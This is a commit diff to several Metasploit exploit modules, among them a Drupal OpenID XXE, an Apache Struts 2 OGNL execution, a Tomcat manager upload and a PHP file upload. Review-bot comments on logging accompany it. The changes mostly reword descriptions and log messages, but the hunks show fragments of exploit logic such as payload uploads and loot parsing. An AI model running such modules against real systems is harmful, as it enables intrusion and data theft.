commit
ab4f62c44e
|
@ -17,10 +17,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'Drupal OpenID External Entity Injection',
|
'Name' => 'Drupal OpenID External Entity Injection',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module abuses a XML External Entity Injection on the OpenID module
|
This module abuses an XML External Entity Injection
|
||||||
from Drupal. The vulnerability exists on the parsing of a malformed XRDS
|
vulnerability on the OpenID module from Drupal. The vulnerability exists
|
||||||
file coming from a malicious OpenID endpoint. This module has been tested
|
in the parsing of a malformed XRDS file coming from a malicious OpenID
|
||||||
successfully in Drupal 7.15 and 7.2 with the OpenID module enabled.
|
endpoint. This module has been tested successfully on Drupal 7.15 and
|
||||||
|
7.2 with the OpenID module enabled.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
@ -102,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
res = send_openid_auth(signature)
|
res = send_openid_auth(signature)
|
||||||
|
|
||||||
unless res
|
unless res
|
||||||
vprint_status("Connection timed out")
|
vprint_status("#{peer} - Connection timed out")
|
||||||
return Exploit::CheckCode::Unknown
|
return Exploit::CheckCode::Unknown
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -157,12 +158,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
def on_request_uri(cli, request)
|
def on_request_uri(cli, request)
|
||||||
if request.uri =~ /#{@prefix}/
|
if request.uri =~ /#{@prefix}/
|
||||||
vprint_status("Signature found, parsing file...")
|
vprint_status("#{peer} - Signature found, parsing file...")
|
||||||
@http_loot = parse_loot(request.uri)
|
@http_loot = parse_loot(request.uri)
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Sending XRDS...")
|
print_status("#{peer} - Sending XRDS...")
|
||||||
send_response_html(cli, xrds_file, { 'Content-Type' => 'application/xrds+xml' })
|
send_response_html(cli, xrds_file, { 'Content-Type' => 'application/xrds+xml' })
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
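Review bot: In `on_request_uri` the new `#{peer}` prefix labels an inbound HTTP request with what is presumably the configured target address (assuming `peer` is the HTTP client helper built from the target host and port), not the address that actually connected through `cli`. The two can differ, for example when the fetch arrives through a proxy or NAT, so the log can attribute a request to the wrong host. Taking the address from the connection, e.g. `print_status("#{cli.peerhost} - Sending XRDS...")`, keeps the message tied to what was observed; the same applies to the "Signature found" message above it. Separately, `request.uri =~ /#{@prefix}/` interpolates `@prefix` unescaped and unanchored, so `Regexp.escape(@prefix)` would be safer if the value can ever contain regex metacharacters (its origin is outside this hunk).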
|
@ -13,13 +13,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'Apache Struts Developer Mode OGNL Execution',
|
'Name' => 'Apache Struts 2 Developer Mode OGNL Execution',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a remote command execution vulnerability in Apache
|
This module exploits a remote command execution vulnerability in Apache
|
||||||
Struts 2. The problem exists on applications running in developer mode,
|
Struts 2. The problem exists on applications running in developer mode,
|
||||||
where the DebuggingInterceptor allows evaluation and execution of OGNL
|
where the DebuggingInterceptor allows evaluation and execution of OGNL
|
||||||
expressions, which allows remote attackers to execute arbitrary Java
|
expressions, which allows remote attackers to execute arbitrary Java
|
||||||
code. This module has been tested successfully in Struts 2.3.16, Tomcat
|
code. This module has been tested successfully on Struts 2.3.16, Tomcat
|
||||||
7 and Ubuntu 10.04.
|
7 and Ubuntu 10.04.
|
||||||
},
|
},
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
|
|
@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'Apache Tomcat Manager Application Upload Authenticated Code Execution',
|
'Name' => 'Apache Tomcat Manager Authenticated Upload Code Execution',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module can be used to execute a payload on Apache Tomcat servers that
|
This module can be used to execute a payload on Apache Tomcat servers that
|
||||||
have an exposed "manager" application. The payload is uploaded as a WAR archive
|
have an exposed "manager" application. The payload is uploaded as a WAR archive
|
||||||
|
@ -198,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
res = send_request_raw('uri' => path)
|
res = send_request_raw('uri' => path)
|
||||||
|
|
||||||
unless res and res.code == 200
|
unless res and res.code == 200
|
||||||
vprint_error("Failed: Error requesting #{path}")
|
vprint_error("#{peer} - Failed: Error requesting #{path}")
|
||||||
return nil
|
return nil
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -372,7 +372,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
if res.code < 200 or res.code >= 300
|
if res.code < 200 or res.code >= 300
|
||||||
vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401
|
vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401
|
||||||
vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]")
|
vprint_error("#{peer} - Upload failed on #{upload_path} [#{res.code} #{res.message}]")
|
||||||
return false
|
return false
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -423,4 +423,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
return true
|
return true
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
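Review bot: The 401 warning in the upload-failure branch is left without the `#{peer} - ` prefix that this commit adds to the `vprint_error` directly below it, so two lines of the same failure report are formatted differently and the warning cannot be matched to a host when several targets are logged together. It could read `vprint_warning("#{peer} - Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401`. That branch also reads `res.code` directly; whether `res` is checked for nil beforehand is outside the hunk, unlike the `unless res and res.code == 200` guard in the earlier hunk of this file.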
|
@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"")
|
data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"")
|
||||||
post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')
|
post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')
|
||||||
|
|
||||||
print_status("#{peer} - Uploading malicious file...")
|
print_status("#{peer} - Uploading PHP payload...")
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'uri' => normalize_uri(target_uri.path, 'upload.php'),
|
'uri' => normalize_uri(target_uri.path, 'upload.php'),
|
||||||
|
|
|
@ -76,6 +76,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
uri = normalize_uri(target_uri.path.to_s, "index.php")
|
uri = normalize_uri(target_uri.path.to_s, "index.php")
|
||||||
|
|
||||||
|
vprint_status("#{peer} - Sending request to #{uri}.")
|
||||||
|
|
||||||
send_request_cgi({
|
send_request_cgi({
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
|
|